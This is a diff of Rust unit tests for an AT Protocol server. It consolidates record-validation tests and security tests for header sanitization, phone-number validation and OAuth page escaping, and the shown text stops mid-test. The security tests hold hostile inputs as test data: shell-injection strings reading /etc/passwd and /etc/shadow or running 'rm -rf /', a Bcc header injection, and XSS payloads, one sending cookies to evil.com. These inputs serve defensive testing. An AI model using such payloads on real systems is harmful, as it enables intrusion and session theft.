||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_valid() {
|
||||
fn test_follow_and_block_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
|
||||
let valid_follow = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"subject": "did:plc:test12345",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
let missing_follow_subject = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_follow_invalid_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let follow = json!({
|
||||
let invalid_follow_subject = json!({
|
||||
"$type": "app.bsky.graph.follow",
|
||||
"subject": "not-a-did",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&follow, "app.bsky.graph.follow");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_block_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let block = json!({
|
||||
let valid_block = json!({
|
||||
"$type": "app.bsky.graph.block",
|
||||
"subject": "did:plc:blocked123",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&block, "app.bsky.graph.block");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_block_invalid_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let block = json!({
|
||||
let invalid_block_subject = json!({
|
||||
"$type": "app.bsky.graph.block",
|
||||
"subject": "not-a-did",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&block, "app.bsky.graph.block");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_valid() {
|
||||
fn test_list_and_graph_records_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let list = json!({
|
||||
|
||||
let valid_list = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": "My List",
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_name_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "n".repeat(65);
|
||||
let list = json!({
|
||||
let list_name_too_long = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": long_name,
|
||||
"name": "n".repeat(65),
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_empty_name() {
|
||||
let validator = RecordValidator::new();
|
||||
let list = json!({
|
||||
let list_empty_name = json!({
|
||||
"$type": "app.bsky.graph.list",
|
||||
"name": "",
|
||||
"purpose": "app.bsky.graph.defs#modlist",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&list, "app.bsky.graph.list");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
|
||||
|
||||
let valid_list_item = json!({
|
||||
"$type": "app.bsky.graph.listitem",
|
||||
"subject": "did:plc:test123",
|
||||
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
|
||||
"createdAt": now()
|
||||
});
|
||||
assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_feed_generator_valid() {
|
||||
fn test_misc_record_types_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let generator = json!({
|
||||
|
||||
let valid_generator = json!({
|
||||
"$type": "app.bsky.feed.generator",
|
||||
"did": "did:web:example.com",
|
||||
"displayName": "My Feed",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&generator, "app.bsky.feed.generator");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_feed_generator_displayname_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "f".repeat(241);
|
||||
let generator = json!({
|
||||
let generator_displayname_too_long = json!({
|
||||
"$type": "app.bsky.feed.generator",
|
||||
"did": "did:web:example.com",
|
||||
"displayName": long_name,
|
||||
"displayName": "f".repeat(241),
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&generator, "app.bsky.feed.generator");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
|
||||
);
|
||||
}
|
||||
assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type_returns_unknown() {
|
||||
let validator = RecordValidator::new();
|
||||
let custom = json!({
|
||||
"$type": "com.custom.record",
|
||||
"data": "test"
|
||||
});
|
||||
let result = validator.validate(&custom, "com.custom.record");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type_strict_rejects() {
|
||||
let validator = RecordValidator::new().require_lexicon(true);
|
||||
let custom = json!({
|
||||
"$type": "com.custom.record",
|
||||
"data": "test"
|
||||
});
|
||||
let result = validator.validate(&custom, "com.custom.record");
|
||||
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_type_mismatch() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {"uri": "at://test", "cid": "bafytest"},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
|
||||
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_missing_type() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!({
|
||||
"text": "Hello"
|
||||
});
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingType)));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_not_object() {
|
||||
let validator = RecordValidator::new();
|
||||
let record = json!("just a string");
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_format_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00.000Z"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_with_offset() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00+05:30"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_datetime_invalid_format() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024/01/15"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(
|
||||
result,
|
||||
Err(ValidationError::InvalidDatetime { .. })
|
||||
));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_valid() {
|
||||
assert!(validate_record_key("3k2n5j2").is_ok());
|
||||
assert!(validate_record_key("valid-key").is_ok());
|
||||
assert!(validate_record_key("valid_key").is_ok());
|
||||
assert!(validate_record_key("valid.key").is_ok());
|
||||
assert!(validate_record_key("valid~key").is_ok());
|
||||
assert!(validate_record_key("self").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_empty() {
|
||||
let result = validate_record_key("");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_dot() {
|
||||
assert!(validate_record_key(".").is_err());
|
||||
assert!(validate_record_key("..").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_invalid_chars() {
|
||||
assert!(validate_record_key("invalid/key").is_err());
|
||||
assert!(validate_record_key("invalid key").is_err());
|
||||
assert!(validate_record_key("invalid@key").is_err());
|
||||
assert!(validate_record_key("invalid#key").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_too_long() {
|
||||
let long_key = "k".repeat(513);
|
||||
let result = validate_record_key(&long_key);
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key_at_max_length() {
|
||||
let max_key = "k".repeat(512);
|
||||
assert!(validate_record_key(&max_key).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_valid() {
|
||||
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
|
||||
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
|
||||
assert!(validate_collection_nsid("a.b.c").is_ok());
|
||||
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_empty() {
|
||||
let result = validate_collection_nsid("");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_too_few_segments() {
|
||||
assert!(validate_collection_nsid("a").is_err());
|
||||
assert!(validate_collection_nsid("a.b").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_empty_segment() {
|
||||
assert!(validate_collection_nsid("a..b.c").is_err());
|
||||
assert!(validate_collection_nsid(".a.b.c").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c.").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid_invalid_chars() {
|
||||
assert!(validate_collection_nsid("a.b.c/d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c_d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c@d").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_threadgate() {
|
||||
let validator = RecordValidator::new();
|
||||
let gate = json!({
|
||||
let valid_threadgate = json!({
|
||||
"$type": "app.bsky.feed.threadgate",
|
||||
"post": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_labeler_service() {
|
||||
let validator = RecordValidator::new();
|
||||
let labeler = json!({
|
||||
let valid_labeler = json!({
|
||||
"$type": "app.bsky.labeler.service",
|
||||
"policies": {
|
||||
"labelValues": ["spam", "nsfw"]
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&labeler, "app.bsky.labeler.service");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_list_item() {
|
||||
fn test_type_and_format_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let item = json!({
|
||||
"$type": "app.bsky.graph.listitem",
|
||||
"subject": "did:plc:test123",
|
||||
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
|
||||
let strict_validator = RecordValidator::new().require_lexicon(true);
|
||||
|
||||
let custom_record = json!({
|
||||
"$type": "com.custom.record",
|
||||
"data": "test"
|
||||
});
|
||||
assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown);
|
||||
assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_))));
|
||||
|
||||
let type_mismatch = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {"uri": "at://test", "cid": "bafytest"},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&item, "app.bsky.graph.listitem");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
assert!(matches!(
|
||||
validator.validate(&type_mismatch, "app.bsky.feed.post"),
|
||||
Err(ValidationError::TypeMismatch { expected, actual }) if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"
|
||||
));
|
||||
|
||||
let missing_type = json!({
|
||||
"text": "Hello"
|
||||
});
|
||||
assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType)));
|
||||
|
||||
let not_object = json!("just a string");
|
||||
assert!(matches!(validator.validate(¬_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_))));
|
||||
|
||||
let valid_datetime = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00.000Z"
|
||||
});
|
||||
assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
let datetime_with_offset = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024-01-15T10:30:00+05:30"
|
||||
});
|
||||
assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
let invalid_datetime = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Test",
|
||||
"createdAt": "2024/01/15"
|
||||
});
|
||||
assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. })));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_record_key_validation() {
|
||||
assert!(validate_record_key("3k2n5j2").is_ok());
|
||||
assert!(validate_record_key("valid-key").is_ok());
|
||||
assert!(validate_record_key("valid_key").is_ok());
|
||||
assert!(validate_record_key("valid.key").is_ok());
|
||||
assert!(validate_record_key("valid~key").is_ok());
|
||||
assert!(validate_record_key("self").is_ok());
|
||||
|
||||
assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_))));
|
||||
|
||||
assert!(validate_record_key(".").is_err());
|
||||
assert!(validate_record_key("..").is_err());
|
||||
|
||||
assert!(validate_record_key("invalid/key").is_err());
|
||||
assert!(validate_record_key("invalid key").is_err());
|
||||
assert!(validate_record_key("invalid@key").is_err());
|
||||
assert!(validate_record_key("invalid#key").is_err());
|
||||
|
||||
assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_))));
|
||||
assert!(validate_record_key(&"k".repeat(512)).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_collection_nsid_validation() {
|
||||
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
|
||||
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
|
||||
assert!(validate_collection_nsid("a.b.c").is_ok());
|
||||
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
|
||||
|
||||
assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_))));
|
||||
|
||||
assert!(validate_collection_nsid("a").is_err());
|
||||
assert!(validate_collection_nsid("a.b").is_err());
|
||||
|
||||
assert!(validate_collection_nsid("a..b.c").is_err());
|
||||
assert!(validate_collection_nsid(".a.b.c").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c.").is_err());
|
||||
|
||||
assert!(validate_collection_nsid("a.b.c/d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c_d").is_err());
|
||||
assert!(validate_collection_nsid("a.b.c@d").is_err());
|
||||
}
|
||||
|
||||
@@ -4,145 +4,70 @@ use bspds::notifications::{SendError, is_valid_phone_number, sanitize_header_val
|
||||
use bspds::oauth::templates::{error_page, login_page, success_page};
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_removes_crlf() {
|
||||
fn test_header_injection_sanitization() {
|
||||
let malicious = "Injected\r\nBcc: attacker@evil.com";
|
||||
let sanitized = sanitize_header_value(malicious);
|
||||
assert!(!sanitized.contains('\r'), "CR should be removed");
|
||||
assert!(!sanitized.contains('\n'), "LF should be removed");
|
||||
assert!(
|
||||
sanitized.contains("Injected"),
|
||||
"Original content should be preserved"
|
||||
);
|
||||
assert!(
|
||||
sanitized.contains("Bcc:"),
|
||||
"Text after newline should be on same line (no header injection)"
|
||||
);
|
||||
}
|
||||
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
|
||||
assert!(sanitized.contains("Injected") && sanitized.contains("Bcc:"));
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_preserves_content() {
|
||||
let normal = "Normal Subject Line";
|
||||
let sanitized = sanitize_header_value(normal);
|
||||
assert_eq!(sanitized, "Normal Subject Line");
|
||||
}
|
||||
assert_eq!(sanitize_header_value(normal), "Normal Subject Line");
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_trims_whitespace() {
|
||||
let padded = " Subject ";
|
||||
let sanitized = sanitize_header_value(padded);
|
||||
assert_eq!(sanitized, "Subject");
|
||||
}
|
||||
assert_eq!(sanitize_header_value(padded), "Subject");
|
||||
|
||||
#[test]
|
||||
fn test_sanitize_header_value_handles_multiple_newlines() {
|
||||
let input = "Line1\r\nLine2\nLine3\rLine4";
|
||||
let sanitized = sanitize_header_value(input);
|
||||
assert!(!sanitized.contains('\r'), "CR should be removed");
|
||||
assert!(!sanitized.contains('\n'), "LF should be removed");
|
||||
assert!(
|
||||
sanitized.contains("Line1"),
|
||||
"Content before newlines preserved"
|
||||
);
|
||||
assert!(
|
||||
sanitized.contains("Line4"),
|
||||
"Content after newlines preserved"
|
||||
);
|
||||
}
|
||||
let multi_newline = "Line1\r\nLine2\nLine3\rLine4";
|
||||
let sanitized = sanitize_header_value(multi_newline);
|
||||
assert!(!sanitized.contains('\r') && !sanitized.contains('\n'));
|
||||
assert!(sanitized.contains("Line1") && sanitized.contains("Line4"));
|
||||
|
||||
#[test]
|
||||
fn test_email_header_injection_sanitization() {
|
||||
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
|
||||
let sanitized = sanitize_header_value(header_injection);
|
||||
let lines: Vec<&str> = sanitized.split("\r\n").collect();
|
||||
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
|
||||
assert!(
|
||||
sanitized.contains("Normal Subject"),
|
||||
"Original content preserved"
|
||||
);
|
||||
assert!(
|
||||
sanitized.contains("Bcc:"),
|
||||
"Content after CRLF preserved as same line text"
|
||||
);
|
||||
assert!(
|
||||
sanitized.contains("X-Injected:"),
|
||||
"All content on same line"
|
||||
);
|
||||
assert_eq!(sanitized.split("\r\n").count(), 1);
|
||||
assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:"));
|
||||
|
||||
let with_null = "client\0id";
|
||||
assert!(sanitize_header_value(with_null).contains("client"));
|
||||
|
||||
let long_input = "x".repeat(10000);
|
||||
assert!(!sanitize_header_value(&long_input).is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_accepts_correct_format() {
|
||||
fn test_phone_number_validation() {
|
||||
assert!(is_valid_phone_number("+1234567890"));
|
||||
assert!(is_valid_phone_number("+12025551234"));
|
||||
assert!(is_valid_phone_number("+442071234567"));
|
||||
assert!(is_valid_phone_number("+4915123456789"));
|
||||
assert!(is_valid_phone_number("+1"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_missing_plus() {
|
||||
assert!(!is_valid_phone_number("1234567890"));
|
||||
assert!(!is_valid_phone_number("12025551234"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_empty() {
|
||||
assert!(!is_valid_phone_number(""));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_just_plus() {
|
||||
assert!(!is_valid_phone_number("+"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_too_long() {
|
||||
assert!(!is_valid_phone_number("+12345678901234567890123"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_letters() {
|
||||
assert!(!is_valid_phone_number("+abc123"));
|
||||
assert!(!is_valid_phone_number("+1234abc"));
|
||||
assert!(!is_valid_phone_number("+a"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_spaces() {
|
||||
assert!(!is_valid_phone_number("+1234 5678"));
|
||||
assert!(!is_valid_phone_number("+ 1234567890"));
|
||||
assert!(!is_valid_phone_number("+1 "));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_valid_phone_number_rejects_special_chars() {
|
||||
assert!(!is_valid_phone_number("+123-456-7890"));
|
||||
assert!(!is_valid_phone_number("+1(234)567890"));
|
||||
assert!(!is_valid_phone_number("+1.234.567.890"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signal_recipient_command_injection_blocked() {
|
||||
let malicious_inputs = vec![
|
||||
"+123; rm -rf /",
|
||||
"+123 && cat /etc/passwd",
|
||||
"+123`id`",
|
||||
"+123$(whoami)",
|
||||
"+123|cat /etc/shadow",
|
||||
"+123\n--help",
|
||||
"+123\r\n--version",
|
||||
"+123--help",
|
||||
];
|
||||
for input in malicious_inputs {
|
||||
assert!(
|
||||
!is_valid_phone_number(input),
|
||||
"Malicious input '{}' should be rejected",
|
||||
input
|
||||
);
|
||||
for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`",
|
||||
"+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help",
|
||||
"+123\r\n--version", "+123--help"] {
|
||||
assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_image_file_size_limit_enforced() {
|
||||
fn test_image_file_size_limits() {
|
||||
let processor = ImageProcessor::new();
|
||||
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
|
||||
let result = processor.process(&oversized_data, "image/jpeg");
|
||||
@@ -156,321 +81,109 @@ fn test_image_file_size_limit_enforced() {
|
||||
}
|
||||
Ok(_) => panic!("Should reject files over size limit"),
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_image_file_size_limit_configurable() {
|
||||
let processor = ImageProcessor::new().with_max_file_size(1024);
|
||||
let data: Vec<u8> = vec![0u8; 2048];
|
||||
let result = processor.process(&data, "image/jpeg");
|
||||
assert!(result.is_err(), "Should reject files over configured limit");
|
||||
assert!(processor.process(&data, "image/jpeg").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_client_id() {
|
||||
let malicious_client_id = "<script>alert('xss')</script>";
|
||||
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
|
||||
assert!(!html.contains("<script>"), "Script tags should be escaped");
|
||||
assert!(
|
||||
html.contains("<script>"),
|
||||
"HTML entities should be used for escaping"
|
||||
);
|
||||
fn test_oauth_template_xss_protection() {
|
||||
let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None);
|
||||
assert!(!html.contains("<script>") && html.contains("<script>"));
|
||||
|
||||
let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None);
|
||||
assert!(!html.contains("<img ") && html.contains("<img"));
|
||||
|
||||
let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None);
|
||||
assert!(!html.contains("<script>"));
|
||||
|
||||
let html = login_page("client123", None, None, "test-uri",
|
||||
Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None);
|
||||
assert!(!html.contains("<script>"));
|
||||
|
||||
let html = login_page("client123", None, None, "test-uri", None,
|
||||
Some("\" onfocus=\"alert('xss')\" autofocus=\""));
|
||||
assert!(!html.contains("onfocus=\"alert") && html.contains("""));
|
||||
|
||||
let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None);
|
||||
assert!(!html.contains("onmouseover=\"alert"));
|
||||
|
||||
let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>"));
|
||||
assert!(!html.contains("<script>") && !html.contains("<img "));
|
||||
|
||||
let html = success_page(Some("<script>steal_session()</script>"));
|
||||
assert!(!html.contains("<script>"));
|
||||
|
||||
for (page, name) in [
|
||||
(login_page("client", None, None, "uri", None, None), "login"),
|
||||
(error_page("err", None), "error"),
|
||||
(success_page(None), "success"),
|
||||
] {
|
||||
assert!(!page.contains("javascript:"), "{} page has javascript: URL", name);
|
||||
}
|
||||
|
||||
let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None);
|
||||
assert!(html.contains("action=\"/oauth/authorize\""));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_client_name() {
|
||||
let malicious_client_name = "<img src=x onerror=alert('xss')>";
|
||||
let html = login_page(
|
||||
"client123",
|
||||
Some(malicious_client_name),
|
||||
None,
|
||||
"test-uri",
|
||||
None,
|
||||
None,
|
||||
);
|
||||
assert!(!html.contains("<img "), "IMG tags should be escaped");
|
||||
assert!(
|
||||
html.contains("<img"),
|
||||
"IMG tag should be escaped as HTML entity"
|
||||
);
|
||||
fn test_oauth_template_html_escaping() {
|
||||
let html = login_page("client&test", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("&") && !html.contains("client&test"));
|
||||
|
||||
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
|
||||
assert!(html.contains(""") || html.contains("""));
|
||||
assert!(html.contains("'") || html.contains("'"));
|
||||
|
||||
let html = login_page("client<test>more", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("<") && html.contains(">") && !html.contains("<test>"));
|
||||
|
||||
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"),
|
||||
"valid-uri", None, Some("user@example.com"));
|
||||
assert!(html.contains("my-safe-client") || html.contains("My Safe App"));
|
||||
assert!(html.contains("read write") || html.contains("read"));
|
||||
assert!(html.contains("user@example.com"));
|
||||
|
||||
let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None);
|
||||
assert!(!html.contains("onclick=\"alert"));
|
||||
|
||||
let html = login_page("客户端 クライアント", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("客户端") || html.contains("&#"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_scope() {
|
||||
let malicious_scope = "\"><script>alert('xss')</script>";
|
||||
let html = login_page(
|
||||
"client123",
|
||||
None,
|
||||
Some(malicious_scope),
|
||||
"test-uri",
|
||||
None,
|
||||
None,
|
||||
);
|
||||
assert!(
|
||||
!html.contains("<script>"),
|
||||
"Script tags in scope should be escaped"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_error_message() {
|
||||
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
|
||||
let html = login_page(
|
||||
"client123",
|
||||
None,
|
||||
None,
|
||||
"test-uri",
|
||||
Some(malicious_error),
|
||||
None,
|
||||
);
|
||||
assert!(
|
||||
